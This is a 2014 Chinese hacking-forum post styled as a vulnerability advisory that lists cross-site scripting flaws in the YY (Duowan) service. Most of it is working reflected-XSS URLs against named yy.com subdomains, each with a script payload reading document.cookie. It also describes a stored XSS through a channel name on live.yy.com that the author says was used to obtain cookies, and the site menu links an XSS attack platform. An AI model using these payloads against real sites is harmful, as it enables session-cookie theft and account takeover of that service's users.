切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
多玩歪歪xss漏洞集[ CodeSec-2014-0010 ][复制链接]
发表于 2014-5-3 14:43:26 | 显示全部楼层 |!read_mode!

开发者漏洞预警 —— 多玩歪歪xss漏洞集 [ CodeSec-2014-0010 ]

漏洞编号: CodeSec-2014-0010

漏洞标题: 多玩歪歪xss漏洞集

漏洞类型: 脚本跨站

漏洞危害等级: 中等

漏洞状态: 漏洞发布,联系作者中...

漏洞细节:
细节看文章

修补方案:
过滤特殊字符

源码地址:
http://www.yy.com

论坛备份源码地址:
暂无

开发者回复: 暂无

反射型Xss 很多 这些是部分.

http://www.yy.com/index/s?wd=<script>alert(document.cookie)</script>&id=88952634

http://yxgh.g.yy.com/gameIndex/index?uid=1%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&gameId=262&gameName=%E4%B8%AD%E5%8D%8E%E9%BE%99%E5%A1%94

http://yxgh.g.yy.com/gameinfo/vip?uid=1%3Cscript%3Ealert%28document.cookie%29%3C/script%3E

http://open.yy.com/wiki/load.php?debug=false&lang=zh-hans&modules=mediawiki.legacy.commonPrint%2Cshared&only=styles&skin=wen

================================================================================================
存储型的. 只找到一个. 成功拿到cookie .....


详情出现在多玩歪歪 新建频道为xss名称[code] 在live.yy.com 查看频道信息 可以偷取cookie 具体看 攻击者怎么利用此洞了``


附件: 你需要登录才可以下载或查看附件。没有帐号?加入Team
已有 1 人评分金币 收起 理由
店小二01 + 100 很给力!

总评分: 金币 + 100   查看全部评分

发表于 2014-8-1 21:26:01 | 显示全部楼层
{:jinguanzhang36:}{:jinguanzhang36:}
突然长见识啊
发表于 2014-11-12 08:59:25 | 显示全部楼层
顶一个吧。。   

代码区

GMT+8, 2019-9-19 04:01

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部